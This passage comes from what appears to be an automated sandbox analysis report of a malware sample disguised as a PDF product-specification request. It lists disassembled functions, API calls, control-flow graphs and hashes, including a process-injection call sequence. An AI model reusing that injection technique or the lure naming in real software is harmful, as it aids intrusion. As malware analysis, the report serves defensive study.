                                                                                                                • API String ID: 2694422964-901305683
                                                                                                                • Opcode ID: a25d600b78d1027ecd8ca45f21d01d98a18ac84e603ebb5a93b2083d1d8bec4c
                                                                                                                • Instruction ID: c9cae55284a1f41560d2add140136bd527ed19116ada8e9708d8be62191e8c0a
                                                                                                                • Opcode Fuzzy Hash: a25d600b78d1027ecd8ca45f21d01d98a18ac84e603ebb5a93b2083d1d8bec4c
                                                                                                                • Instruction Fuzzy Hash: E2519334E04248DBEF12DBA4C854BEFBB75AF18700F004599E649BB2D1D7BA0B45CB65
                                                                                                                Function 00A72DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 702 a72df8-a72e0f GetLastError 703 a72e11-a72e1b call a7320e 702->703 704 a72e1d-a72e24 call a74c7d 702->704 703->704 709 a72e6e-a72e75 SetLastError 703->709 708 a72e29-a72e2f 704->708 710 a72e31 708->710 711 a72e3a-a72e48 call a73264 708->711 712 a72e77-a72e7c 709->712 713 a72e32-a72e38 call a729c8 710->713 717 a72e4d-a72e63 call a72be6 call a729c8 711->717 718 a72e4a-a72e4b 711->718 721 a72e65-a72e6c SetLastError 713->721 717->709 717->721 718->713 721->712
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00A6F2DE,00A73863,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6), ref: 00A72DFD
                                                                                                                • _free.LIBCMT ref: 00A72E32
                                                                                                                • _free.LIBCMT ref: 00A72E59
                                                                                                                • SetLastError.KERNEL32(00000000,00A41129), ref: 00A72E66
                                                                                                                • SetLastError.KERNEL32(00000000,00A41129), ref: 00A72E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: 170f72bd4ce81957cce1f1646969f272e66699f5cc6346ae93499f587d0db948
                                                                                                                • Instruction ID: f37ee0f7af460c2b97d78312eb3b09615f4cb332fb3312743fae737b6dfb851b
                                                                                                                • Opcode Fuzzy Hash: 170f72bd4ce81957cce1f1646969f272e66699f5cc6346ae93499f587d0db948
                                                                                                                • Instruction Fuzzy Hash: 8601F4322056007BCA1267746D45F6B2E6DABE53B1B65C129F82DA22E3EF648C414320
                                                                                                                Function 00A43B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 761 a43b1c-a43b27 762 a43b99-a43b9b 761->762 763 a43b29-a43b2e 761->763 765 a43b8c-a43b8f 762->765 763->762 764 a43b30-a43b48 RegOpenKeyExW 763->764 764->762 766 a43b4a-a43b69 RegQueryValueExW 764->766 767 a43b80-a43b8b RegCloseKey 766->767 768 a43b6b-a43b76 766->768 767->765 769 a43b90-a43b97 768->769 770 a43b78-a43b7a 768->770 771 a43b7e 769->771 770->771 771->767
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B40
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B61
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B83
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 42c803ba1c1827c6bf45df6aa0c9f94a65861878e7b6df2ea8f1a2cc70a43e32
                                                                                                                • Instruction ID: 923e9054ed688a9da778464b7b887ea132498417d69d645a41d6279ae9b7319d
                                                                                                                • Opcode Fuzzy Hash: 42c803ba1c1827c6bf45df6aa0c9f94a65861878e7b6df2ea8f1a2cc70a43e32
                                                                                                                • Instruction Fuzzy Hash: E2112ABA511208FFDF21CFA5DC44AAEB7B8EF44754B10855AA806D7110E2719E469760
                                                                                                                Function 0141CF80 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 772 141cf80-141d020 call 141f420 * 3 779 141d022-141d02c 772->779 780 141d037 772->780 779->780 782 141d02e-141d035 779->782 781 141d03e-141d047 780->781 783 141d04e-141d700 781->783 782->781 784 141d713-141d740 CreateProcessW 783->784 785 141d702-141d706 783->785 793 141d742-141d745 784->793 794 141d74a 784->794 786 141d708-141d70c 785->786 787 141d74c-141d779 785->787 788 141d785-141d7b2 786->788 789 141d70e 786->789 805 141d783 787->805 806 141d77b-141d77e 787->806 792 141d7bc-141d7d6 Wow64GetThreadContext 788->792 814 141d7b4-141d7b7 788->814 789->792 795 141d7d8 792->795 796 141d7dd-141d7f8 ReadProcessMemory 792->796 798 141db41-141db43 793->798 794->792 800 141daea-141daee 795->800 801 141d7fa 796->801 802 141d7ff-141d808 796->802 807 141daf0-141daf4 800->807 808 141db3f 800->808 801->800 803 141d831-141d850 call 141eaa0 802->803 804 141d80a-141d819 802->804 822 141d852 803->822 823 141d857-141d87a call 141ebe0 803->823 804->803 810 141d81b-141d82a call 141e9f0 804->810 805->792 806->798 812 141daf6-141db02 807->812 813 141db09-141db0d 807->813 808->798 810->803 827 141d82c 810->827 812->813 817 141db19-141db1d 813->817 818 141db0f-141db12 813->818 814->792 814->798 819 141db29-141db2d 817->819 820 141db1f-141db22 817->820 818->817 825 141db3a-141db3d 819->825 826 141db2f-141db35 call 141e9f0 819->826 820->819 822->800 831 141d8c4-141d8e5 call 141ebe0 823->831 832 141d87c-141d883 823->832 825->798 826->825 827->800 839 141d8e7 831->839 840 141d8ec-141d90a call 141f440 831->840 834 141d885-141d8b6 call 141ebe0 832->834 835 141d8bf 832->835 841 141d8b8 834->841 842 141d8bd 834->842 835->800 839->800 845 141d915-141d91f 840->845 841->800 842->831 846 141d921-141d953 call 141f440 845->846 847 141d955-141d959 845->847 846->845 848 141da44-141da61 call 141e5f0 847->848 849 141d95f-141d96f 847->849 858 141da63 848->858 859 141da68-141da87 Wow64SetThreadContext 848->859 849->848 851 141d975-141d985 849->851 851->848 855 141d98b-141d9af 851->855 857 141d9b2-141d9b6 855->857 857->848 862 141d9bc-141d9d1 857->862 858->800 860 141da89 859->860 861 141da8b-141da96 call 141e920 859->861 860->800 868 141da98 861->868 869 141da9a-141da9e 861->869 864 141d9e5-141d9e9 862->864 866 141da27-141da3f 864->866 867 141d9eb-141d9f7 864->867 866->857 870 141da25 867->870 871 141d9f9-141da23 867->871 868->800 872 141daa0-141daa3 869->872 873 141daaa-141daae 869->873 870->864 871->870 872->873 875 141dab0-141dab3 873->875 876 141daba-141dabe 873->876 875->876 877 141dac0-141dac3 876->877 878 141daca-141dace 876->878 877->878 879 141dad0-141dad6 call 141e9f0 878->879 880 141dadb-141dae4 878->880 879->880 880->783 880->800
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0141D73B
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0141D7D1
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0141D7F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                • Instruction ID: d1c47aafb6fc85d4a3e704591b0c6cbd6b3cab1c19cf336b3a6ea8dfae956dd2
                                                                                                                • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                • Instruction Fuzzy Hash: AD620A70E142589BEB24CFA4C854BDEB772EF58300F1091A9D20DEB3A4E7759E81CB59
                                                                                                                Function 00A4DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Variable must be of type 'Object'., xrefs: 00A932B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                • API String ID: 0-109567571
                                                                                                                • Opcode ID: 7fb3623a788e659872bfae39840a21ad3efdb4dd5544f3f16115944fe65aa7d1
                                                                                                                • Instruction ID: c8a4c5cf49c41152453fb912d1c615208ec70468fa0e1285f5331c95391f3663
                                                                                                                • Opcode Fuzzy Hash: 7fb3623a788e659872bfae39840a21ad3efdb4dd5544f3f16115944fe65aa7d1
                                                                                                                • Instruction Fuzzy Hash: 4DC28A7AA00214CFCF24CF98C881AADB7F1FF98310F248569E956AB291D775ED41CB91
                                                                                                                Function 00A43923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A833A2
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A43A04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 2289894680-1585850449
                                                                                                                • Opcode ID: 3513810a0dbf07dc5ea26faa33da041d42b55a17b51a4d50f47f0bdc89d3ea1d
                                                                                                                • Instruction ID: c7e2237c18b6996d6065008fc510f987f39543a79e733d74264ff6c491075f27
                                                                                                                • Opcode Fuzzy Hash: 3513810a0dbf07dc5ea26faa33da041d42b55a17b51a4d50f47f0bdc89d3ea1d
                                                                                                                • Instruction Fuzzy Hash: CA31D472448300AADB21EB24DC45BEBB7E8AF81710F10492AF59A871D1DF709A49C7C7
                                                                                                                Function 00A5FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A60668
                                                                                                                  • Part of subcall function 00A632A4: RaiseException.KERNEL32(?,?,?,00A6068A,?,00B11444,?,?,?,?,?,?,00A6068A,00A41129,00B08738,00A41129), ref: 00A63304
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A60685
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Unknown exception
                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                • Opcode ID: 55e8dd6d65fee4c3e14b5b7428b20d9a7c5c322f6ca0e58c2cc0343cd3c5b415
                                                                                                                • Instruction ID: c7b445cfc7dda720ec74b88380274c24d524fdfbe556ae261651487f877dd931
                                                                                                                • Opcode Fuzzy Hash: 55e8dd6d65fee4c3e14b5b7428b20d9a7c5c322f6ca0e58c2cc0343cd3c5b415
                                                                                                                • Instruction Fuzzy Hash: 33F0AF3990020D6BCB00BAA4D946C9E7B7CAE00354B608571B925965A5EF71DAAAC581
                                                                                                                Function 00AC7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AC82F5
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00AC82FC
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00AC84DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 146820519-0
                                                                                                                • Opcode ID: de0e1728974ace1f65dc1194347e974dc877963c76495ddb4675237929005601
                                                                                                                • Instruction ID: 970946ee0ffc864d4543fa66c182ca78a19c65927e7653afeb9aa241eae87926
                                                                                                                • Opcode Fuzzy Hash: de0e1728974ace1f65dc1194347e974dc877963c76495ddb4675237929005601
                                                                                                                • Instruction Fuzzy Hash: 13127A71A083419FC724DF28C584B6ABBE5BF88324F05895DE8998B352CB35ED45CF92
                                                                                                                Function 00A410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A41BF4
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A41BFC
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A41C07
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A41C12
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A41C1A
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A41C22
                                                                                                                  • Part of subcall function 00A41B4A: RegisterWindowMessageW.USER32(00000004,?,00A412C4), ref: 00A41BA2
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A4136A
                                                                                                                • OleInitialize.OLE32 ref: 00A41388
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00A824AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986988660-0
                                                                                                                • Opcode ID: 7cbacf90bf2a6c357fddbeee6e4e0e31dfaf7a3fc73adb4f4b5514a3d64f03cd
                                                                                                                • Instruction ID: 4f0296ac52259d5bc1c77859431a6d2d29f3110e3422c73e96b3d04b1bc443b0
                                                                                                                • Opcode Fuzzy Hash: 7cbacf90bf2a6c357fddbeee6e4e0e31dfaf7a3fc73adb4f4b5514a3d64f03cd
                                                                                                                • Instruction Fuzzy Hash: 2E71C8B99123018FC784EF7DAA556D53AE6FBA83503D4CA2AD60AC7362EF304481CF54
                                                                                                                Function 00A786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,00A785CC,?,00B08CC8,0000000C), ref: 00A78704
                                                                                                                • GetLastError.KERNEL32(?,00A785CC,?,00B08CC8,0000000C), ref: 00A7870E
                                                                                                                • __dosmaperr.LIBCMT ref: 00A78739
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2583163307-0
                                                                                                                • Opcode ID: 304a672814160ad7bcb17b4221a3f4895f51a9e4d67d9de685fc02a1bf8cb2e7
                                                                                                                • Instruction ID: b7c8e0439f73f4c3911c961cedcab99fe99058016d1fd49a79ccd2139feb8809
                                                                                                                • Opcode Fuzzy Hash: 304a672814160ad7bcb17b4221a3f4895f51a9e4d67d9de685fc02a1bf8cb2e7
                                                                                                                • Instruction Fuzzy Hash: 9F012B33E4562036D6246334AD4E77E775A4B92B74F39C119F81D8F1E2DEE89C819150
                                                                                                                Function 00A51310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A517F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Init_thread_footer
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                • Opcode ID: 35205dd87cbb69f45b259eaefc1e4eee274e2ab6bad4a861e700bdab9887e78b
                                                                                                                • Instruction ID: d5143eb875cbaefc3caf49d544d8cb1a61580eb854166977b9a90b8bf9234967
                                                                                                                • Opcode Fuzzy Hash: 35205dd87cbb69f45b259eaefc1e4eee274e2ab6bad4a861e700bdab9887e78b
                                                                                                                • Instruction Fuzzy Hash: F8227B746083019FCB14DF24C581B2ABBF1BF89315F24895DF8968B3A2D771E949CB92
                                                                                                                Function 00A42DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00A82C8C
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00A42DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A42DC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                • String ID: X
                                                                                                                • API String ID: 779396738-3081909835
                                                                                                                • Opcode ID: 9a164fb7b1f6c4516d12e0fbb5f30e394687c70dff8d9cbeec88254400ac6593
                                                                                                                • Instruction ID: a21660192885707fd94763ccd3edd873b1606923c3eaa495a4ef53f8cd4a9485
                                                                                                                • Opcode Fuzzy Hash: 9a164fb7b1f6c4516d12e0fbb5f30e394687c70dff8d9cbeec88254400ac6593
                                                                                                                • Instruction Fuzzy Hash: 5F219071A002589FDF01EF94C945BEE7BFCAF89314F40805AE505AB281DBB45A89CFA1
                                                                                                                Function 00A43837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A43908
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_
